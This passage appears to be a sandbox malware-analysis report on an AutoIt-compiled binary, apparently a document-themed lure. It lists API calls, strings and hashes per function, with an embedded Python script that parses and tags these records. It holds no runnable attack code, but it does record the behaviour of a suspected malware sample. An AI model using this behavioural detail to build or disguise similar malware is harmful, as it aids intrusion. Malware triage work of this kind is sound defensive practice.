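• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008FAC9D), ref: 008FB0EA
• OpenProcessToken.ADVAPI32(00000000,?,?,?,008FAC9D), ref: 008FB0F1
Similarity
• API ID: CurrentOpenProcessThreadToken
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 008FB2DF
• UnloadUserProfile.USERENV(?,?), ref: 008FB2EB
• CloseHandle.KERNEL32(?), ref: 008FB2F4
  • Part of subcall function 008FAB24: HeapFree.KERNEL32(00000000), ref: 008FAB32
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
"""


def parse_blocks(text: str) -> List[Dict]:
    """Split the text at each 'APIs' header and collect the calls and the
    identifying fields of every record.  Lines that are neither a call nor a
    known field (dump paths, hashes we do not need) are skipped."""
    blocks: List[Dict] = []
    cur = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "api_id": "", "fuzzy": ""}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            cur["calls"].append({
                "name": m["name"],
                "module": m["module"],
                "args": m["args"].split(",") if m["args"] else [],
                "addr": int(m["addr"], 16),
                # Address of the enclosing function for "Part of subcall" lines.
                "parent": int(m["parent"], 16) if m["parent"] else None,
            })
            continue
        f = FIELD_RE.match(line)
        if f and f["key"] == "API ID":
            cur["api_id"] = f["val"].strip()
        elif f and f["key"] == "Instruction Fuzzy Hash":
            cur["fuzzy"] = f["val"].strip()
    return blocks


def direct_apis(block: Dict) -> Set[str]:
    """APIs the function calls itself, excluding those attributed to subcalls."""
    return {c["name"] for c in block["calls"] if c["parent"] is None}


def tag_block(block: Dict) -> List[str]:
    names = direct_apis(block)
    return sorted(tag for tag, need in TAGS.items() if need <= names)


def triage(text: str) -> List[Dict]:
    """One summary entry per record: its API ID, the call names in order, tags."""
    return [{"api_id": b["api_id"],
             "calls": [c["name"] for c in b["calls"]],
             "tags": tag_block(b)} for b in parse_blocks(text)]


if __name__ == "__main__":
    for entry in triage(SAMPLE):
        print(entry["api_id"], entry["tags"])
```

Subcall lines are kept but excluded from tagging on purpose: a HeapFree inside a helper says nothing about the caller, and attributing it would tag every function that shares that helper. Arguments are kept as the raw hex strings the report prints, so a caller can still read, for instance, the 0x1388 (5000 ms) timeout and flag 0x2 passed to SendMessageTimeoutW in the first record.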
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 48fe6db2bf4ac8c19378d7d28d4aefbfb30daad3d4193f756100e618a532661d
                                                                              • Instruction ID: f077b8ca72e2df8f256a4693318f670af0a947548c3c6621919d1ffa25beab00
                                                                              • Opcode Fuzzy Hash: 48fe6db2bf4ac8c19378d7d28d4aefbfb30daad3d4193f756100e618a532661d
                                                                              • Instruction Fuzzy Hash: B7E046BD525204EFDB019F70C848A2D7BA8FB4D354F12890AF95ACB310CB799800AB40
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 008FDEAA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ContainedObject
                                                                              • String ID: AutoIt3GUI$Container
                                                                              • API String ID: 3565006973-3941886329
                                                                              • Opcode ID: 735f00974f12a9f23d78c6fc06a64e3f434c9d666def8658198067c4e1aa8f7b
                                                                              • Instruction ID: 73c0f0dcda7dcd4c161be49ffdbc35482d6e0c47bf4dcf7680a43e97d17c9c05
                                                                              • Opcode Fuzzy Hash: 735f00974f12a9f23d78c6fc06a64e3f434c9d666def8658198067c4e1aa8f7b
                                                                              • Instruction Fuzzy Hash: 419116746007059FDB24DF64C884F6AB7BAFF49714F248569FA4ACB291DB70E841CB60
                                                                              APIs
                                                                                • Part of subcall function 008DC6F4: _wcscpy.LIBCMT ref: 008DC717
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • __wcsnicmp.LIBCMT ref: 0090DEFD
                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0090DFC6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                              • String ID: LPT
                                                                              • API String ID: 3222508074-1350329615
                                                                              • Opcode ID: 0757ff5edbcec849c263cc75d61c5f92f90e0c9128111c1eac52c903c47d3b40
                                                                              • Instruction ID: 7f48168c3853c130712668284e7f72d44d43ed726ecbf201e101e9db17f18e2d
                                                                              • Opcode Fuzzy Hash: 0757ff5edbcec849c263cc75d61c5f92f90e0c9128111c1eac52c903c47d3b40
                                                                              • Instruction Fuzzy Hash: 0E618175A04215AFCB14DF98C895EAEB7B8FF48710F00845AF546AB3D1DB74AE40CB91
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 008DBCDA
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 008DBCF3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: b630ce2dbd1cc2cc86cd7c2259d0213dd86c652c2b558d514df194bb3617475e
                                                                              • Instruction ID: c6a377dd91a00f4637dfb90d33c9ceae96edcf40d81f23cdc43fde52cfa08e47
                                                                              • Opcode Fuzzy Hash: b630ce2dbd1cc2cc86cd7c2259d0213dd86c652c2b558d514df194bb3617475e
                                                                              • Instruction Fuzzy Hash: 74513972418744ABE320AF14DC85BAFBBE8FF94754F41494EF1C8811A6DB7089A88753
                                                                              APIs
                                                                                • Part of subcall function 008C44ED: __fread_nolock.LIBCMT ref: 008C450B
                                                                              • _wcscmp.LIBCMT ref: 0090C65D
                                                                              • _wcscmp.LIBCMT ref: 0090C670
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$__fread_nolock
                                                                              • String ID: FILE
                                                                              • API String ID: 4029003684-3121273764
                                                                              • Opcode ID: 888080406884e4478635405e1d2e9e565c7cefde8e7789180670a94ebf4d5968
                                                                              • Instruction ID: c46d8dc284d22efaa0270751f6f67038b252bedc754aa2a126af0c367ae013a0
                                                                              • Opcode Fuzzy Hash: 888080406884e4478635405e1d2e9e565c7cefde8e7789180670a94ebf4d5968
                                                                              • Instruction Fuzzy Hash: 4D41D572A0021ABEDF20ABA49C42FEF77BDEF89714F004469F605EB181D6719A448B51
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0092A85A
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0092A86F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: d9eee25274124fb93d759d5e8e433d6b3c096378f573188c0f5b6e4ba503039a
• Instruction ID: 10ab1655911c9bdc7bc1ee418ac45549be9083262565410c5645a4f3547e8316
• Opcode Fuzzy Hash: d9eee25274124fb93d759d5e8e433d6b3c096378f573188c0f5b6e4ba503039a
• Instruction Fuzzy Hash: 7641F875E013199FDB14DFA8D881BDA7BB9FB08300F14006AE905EB385D770A942DFA5
APIs
• _memset.LIBCMT ref: 00915190
• InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009151C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: 387a196859081bbdfc53998803ee48c29af16db2d6eab7e59e865b1f8be8c627
• Instruction ID: 9a7fb5b715e011c9de864e31c8aa08a2d1a80a5b987b426b645d21c7a367050d
• Opcode Fuzzy Hash: 387a196859081bbdfc53998803ee48c29af16db2d6eab7e59e865b1f8be8c627
• Instruction Fuzzy Hash: 2F313971D00109EBCF11EFE4CC85EEE7FB9FF58710F100019E819A6166EA31A946CBA1
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 0092980E
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0092984A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 4be0e29c9c17204f5efabf2d17e3a5c40f95c244e8ed2c97fa9915f7482aa16b
• Instruction ID: 5ef36edd2fa14e2419ed3b705e19cbe2ed3fade370121cf95673136eb2fa3bf2
• Opcode Fuzzy Hash: 4be0e29c9c17204f5efabf2d17e3a5c40f95c244e8ed2c97fa9915f7482aa16b
• Instruction Fuzzy Hash: EE318B71110614AEEB109F78DC81BFB73ADFF99764F04861AF8A9C7190DA31AC81DB60
APIs
• _memset.LIBCMT ref: 009051C6
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00905201
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 6d793eba45e7360be70352d1c93070df4b89828a9bab3c7e4558648701918b13
• Instruction ID: 45e171478450cc86d3a01cd77a04cf29c2bbc572ae88896fb56337841aa140aa
• Opcode Fuzzy Hash: 6d793eba45e7360be70352d1c93070df4b89828a9bab3c7e4558648701918b13
• Instruction Fuzzy Hash: 2331AE71A00604EFEB24CF9DD845BAFBBF8AF45350F150419E9A1E62E0D7709A84DF11
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: __snwprintf
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 2391506597-2584243854
• Opcode ID: 9fd4bb4c6105486203afc575ae3995a99a58fcaa0c027d8d911d5d2d2b3ce0da
• Instruction ID: 7c7d8dfd265f55aee784f4ec616072b3811c29d11b0d47dce03caec8630090ee
• Opcode Fuzzy Hash: 9fd4bb4c6105486203afc575ae3995a99a58fcaa0c027d8d911d5d2d2b3ce0da
• Instruction Fuzzy Hash: 33217F31A00218AACF10EF68C881FED77B4FF55344F148459F505EB182DB70EA85CBA2
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0092945C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00929467
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 55d207faa447d67de7b1c34dabcc278a0aeb5e91babd1841b38e53a9e901d310
• Instruction ID: ed42c477274800a2a3a7b0d8c3b70a8f662f229d2b32782c6c15abc7262b4557
• Opcode Fuzzy Hash: 55d207faa447d67de7b1c34dabcc278a0aeb5e91babd1841b38e53a9e901d310
• Instruction Fuzzy Hash: F711B271310228BFEF15DF54EC80EBB376FEB883A4F104129F919972A4D6319C528760
APIs
  • Part of subcall function 008DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008DD1BA
  • Part of subcall function 008DD17C: GetStockObject.GDI32(00000011), ref: 008DD1CE
  • Part of subcall function 008DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008DD1D8
• GetWindowRect.USER32(00000000,?), ref: 00929968
• GetSysColor.USER32(00000012), ref: 00929982
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: a61eb54fa9993e263fbfa4d61aef50afd0c6048bdab6ddbadb5e68a659b73155
• Instruction ID: 05a230f4479496caeeba2d68058b321da16d4a524aa24b3487c80a577791f3dd
• Opcode Fuzzy Hash: a61eb54fa9993e263fbfa4d61aef50afd0c6048bdab6ddbadb5e68a659b73155
• Instruction Fuzzy Hash: 72116776520219AFDB04DFB8DC45EEA7BA8FB48314F014628F956E3250E734E850DB60
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00929699
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009296A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: d4de47d5bbb1b8402f04483a3bd144252324e2a27e9a2d610fd48631d35a1057
• Instruction ID: 754741f0e72e1b4d51cf8f68fce98d8729df287d3e816afed5097c7e20ed88c4
• Opcode Fuzzy Hash: d4de47d5bbb1b8402f04483a3bd144252324e2a27e9a2d610fd48631d35a1057
• Instruction Fuzzy Hash: 81118C71510218ABEF209FA8EC84EEB3BAEEB05378F104714F965971E8C735DC51A760
APIs
• _memset.LIBCMT ref: 009052D5
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009052F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 1e51ff7682921772dba52ebd512a80679fb5bcc346a21224a82f3dc23fddb838
• Instruction ID: d242dc58eef931a81ff42944cb60ba19f2c3586af8107a6b799c571437d9113b
• Opcode Fuzzy Hash: 1e51ff7682921772dba52ebd512a80679fb5bcc346a21224a82f3dc23fddb838
• Instruction Fuzzy Hash: 2511DD76A01614EFEB20DA9CD905BAE77BDAB06790F160025E951E72E0D3B0AD05CFA1
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00914DF5
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00914E1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: bdc09dad0fa51c3d7e92772714d8816b58a1b334959672b301c71a4ace62b721
• Instruction ID: cf8e84c3f4f9c636ba92402e8baa617c57ab0e1e04bfe84088eefbe2295a4ae8
• Opcode Fuzzy Hash: bdc09dad0fa51c3d7e92772714d8816b58a1b334959672b301c71a4ace62b721
• Instruction Fuzzy Hash: C711A378701229BBDF258F61D888EFBFAACFF0A755F10852AF51556180D3706981D6E0
APIs
• inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0091A84E
• htons.WSOCK32(00000000,?,00000000), ref: 0091A88B
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 3c38c771a9d2499859b5683c68e1fccb98ef2ebee6324cdbfbae05f45d75bd12
• Instruction ID: 6aa8b9f8c708bb50c9f59b27a1a7ca36866818d7e9d93bf141876a7cf66c9199
• Instruction Fuzzy Hash: F201D279301309ABCB20DFA8C886FE9B368FF45320F10896AF6169B2D1D771EC458752
APIs
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008FB7EF
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 86a1372e111dc7a7ab6e51480b65cb88a718b184945de5e8c69e93f003b67190
• Instruction ID: 93cf3be03877dda9c836da506748ce3f86bbe3e8de1ea5c20e37ca808f591c7d
• Instruction Fuzzy Hash: 1301B175651118ABCB04EBB8CC52EFE3379FF863A4B04061DF566E72D2EB7099088791
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 008FB6EB
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: b21e0d814aa25ea801379a15c2724879302dab7ddf0cd8ba0b14f087d991333c
• Instruction ID: dc1791ee6694f6c679941e582e4e9f624fc90fc914f2f0ff4f8d016cde1f40b9
• Instruction Fuzzy Hash: 13014475641108ABCB04EBB8C952FFE73B9EB55344F14001DF606E31D2EB649E1897A6
APIs
• SendMessageW.USER32(?,00000182,?,00000000), ref: 008FB76C
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: d37b19ec015de605feb85cd6eb6e3aa8c973b8e449d2c1bb7832092aea176ebc
• Instruction ID: e33fb7480b1548b9deb892b39540a91dc079bbadc8f8d52755bffadba74679a3
• Instruction Fuzzy Hash: 7F01A2B5641108ABCB04FBB8C902FFE73ADEF45344F140019B605F3192DB609E0987B6
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: f1dbde2f5a98bf19a5c8ae3ad41b001d63ad129e7f1ca46b12a66b68539af354
• Instruction ID: 980bb2707fd758a8828bbe1ea709332a8063093db3041c7a142c0fee9e9fc9bc
• Instruction Fuzzy Hash: 63E0D877A043242BDB10EAE9DC0AECBFBACEB91B64F014116F905D3181D670E60187D4
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008FA63F
  • Part of subcall function 008E13F1: _doexit.LIBCMT ref: 008E13FB
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: 13c49feb0218aef7ce6e47e963c3cff7be53f61636119de87926873ecba374b4
